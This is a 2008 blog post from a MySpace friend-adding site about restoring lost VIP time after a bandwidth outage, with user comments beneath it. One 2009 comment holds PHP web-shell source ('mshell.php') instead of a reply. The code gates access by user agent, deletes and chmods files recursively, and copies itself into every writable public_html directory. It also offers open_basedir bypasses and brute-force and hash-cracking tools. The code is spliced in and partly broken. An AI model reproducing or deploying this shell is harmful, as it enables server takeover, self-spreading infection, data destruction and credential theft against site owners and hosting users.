Bandwidth and VIP
So last month was crazy and Candy Adds actually ran out of bandwidth for the last week of January. I got some complaints about people losing VIP.. So everyone that had VIP the last day the site was up (1-27) just got back the 5 days they lost plus an extra week. There shouldn't be any more bandwidth problems, and hopefully everyone is happy with an extra week free VIP :)Posted on Feb. 2, 2008
Comments
BBcentral.org - MySpace famoust Sites 2.0k+ - 2008-02-03
aww, thats more i had expected, really nice move from you :) thanks
♥Captain_Krazie♥ {1.8k+} - 2008-02-11
Thanks so Much!! I was wondering how i got more than 2 days vip. I really appreciate it.
peace
Hidden Kiss! [ln-kiss] - 2008-02-18
Awh, that was nice. But like i joined this awhile ago, and bought VIP but it says that i am a new member but im not and i typed in the correct friend id # several times. its just not working!
Pitsch - 2008-02-20
im gonna kill
myself!!!!
Melany - 2008-02-20
My picture wont show up?? It has this weird HTML in its place. Can you fix that please? Its ruining people adding me.
I'm getting ALOT of referrals today, so I wanna make sure my picture is fixed in time for my free vip :]
comment default. [¢¾] - 2008-03-04
grrr. i know i would be-lol
King Yroc - 2008-03-13
I think you should be able to add more than just 500 people a day, i could have like 22,000 friends, but i can only add 500 a day, even ads vip!
MHF. ¢¾ 8k+ - 2008-04-22
hey, all vanessa fans.
i am the second biggest fansite for Vanessa on myspace, but with your help i could be the biggest. So if you want all the latest news, gossip, pictures and videos on Vanessa then add me now.
i also have my own site model amy <- she only site models for me so come check her out too.
i love making new friends and i always reply back to everyone¡¯s comments & messages. ;] so be sure to add me now, I can tell you now you will not regret the add.
Lots of love lidia [miss. Hudgens fansite] xo <33
Popc0rn! - 2009-07-14
function togglecheck()
{
var cb=document.forms[0].check
for (i in cb)
{
cb[i].checked=(cb[i].checked)?false:true;
}
}
";
switch($access_control) #Break statements intentionally ommited
{
case 3:
$ip_allwd=false;
foreach($allowed_addrs as $addr)
{
if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;}
if(!$ip_allwd) exit;
}
case 2:
if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass)
{
header("WWW-Authenticate: Basic Realm=\"Restricted area\"");
header("HTTP/1.1 401 Unauthorized");
echo "Wrong username/password";
exit;
}
case 1:
if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit;
}
if($id)
{
$s=strpos($id,"(",0)+1;
$e=strpos($id,")",$s);
$idval=substr($id,$s,$e-$s);
}
$disable=@ini_get("disable_functions");
if(empty($disable)) $disable="None";
function rm_rep($dir,&$success,&$fail)
{
@$dh=opendir($dir);
if(is_resource($dh))
{
while((@$rm=readdir($dh)))
{
if($rm=='.' || $rm=='..') continue;
if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm..."; rm_rep($dir.'/'.$rm,$success,$fail); continue;}
if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...";}
else {$fail++; echo "Failed to delete $rm";}
}
@closedir($dh);
} else echo "Failed to open dir $dir";
}
function chmod_rep($dir,&$success,&$fail,$mod_value)
{
@$dh=opendir($dir);
if(is_resource($dh))
{
while((@$ch=readdir($dh)))
{
if($ch=='.' || $ch=='..') continue;
if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch..."; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;}
if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...";}
else {$fail++; echo "Failed to chmod $rm";}
}
@closedir($dh);
} else echo "Failed to open dir $dir";
}
#Complete these functions
function spread_self($user,&$c=0,$d=0)
{
if(!$d) $dir="/home/$user/public_html/";
else $dir=$d;
if(is_dir($dir)&&is_writable($dir))
{
copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php');
echo "[+] Shell copied to $dir.$f./mshell.php";
$c++;
}
if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir";
while((@$f=readdir($dh)))
{
if($f!="."&&$f!="..")
{
if(@is_dir($dir.$f))
{
echo "[+] Spreading to dir $dir";
if(@is_writable($dir.$f))
{
copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php');
echo "[+] Shell copied to $dir.$f./mshell.php";
$c++;
}
$c+=spread_self($user,$c,$dir.$f.'/');
}
}
}
}
function copy_rep($dir,&$c)
{
}
function backup_site()
{
if(!isset($_POST['busite']))
{
echo "
| Server IP | Your IP | Disk space | Safe_mode? | Open_BaseDir? | System | Server software | Disabled functions | ID | Shell location |
| $serv | $addr | $space of $total | $safe_mode | $open_basedir | $uname | $soft | $disable | $idval | ".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])." |
"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo ""; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo ""; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!"; @$fh=fopen($_POST['dest'],'r'); echo ""; @fclose($fh); } else echo "Failed to copy file"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo ""; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "
| Security (open_basedir) bypassers | |
| Bypass using cURL | Bypass using tempnam() |
| Bypass using copy() | Bypass using include() |
| Bypass using SQL LOAD INFILE [Login to SQL server first] | |
| Password crackers | |
| MD5 Cracker | SHA1 Cracker |
| Hash: | Hash: |
| VBulletin Salt Cracker | SMF Salt cracker |
| Hash: Salt: | Hash: Salt: |
| MySQL Brute Force | FTP Brute Force |
| User: Host: Port: | User: Host: Port: Timeout: |
| Remote login Brute Force | HTTP-Auth Brute Force |
| Login form: Username: | Username: Auth URL: |
| Wordlist | |
| Notice: Be sure to check the max POST length allowed | |

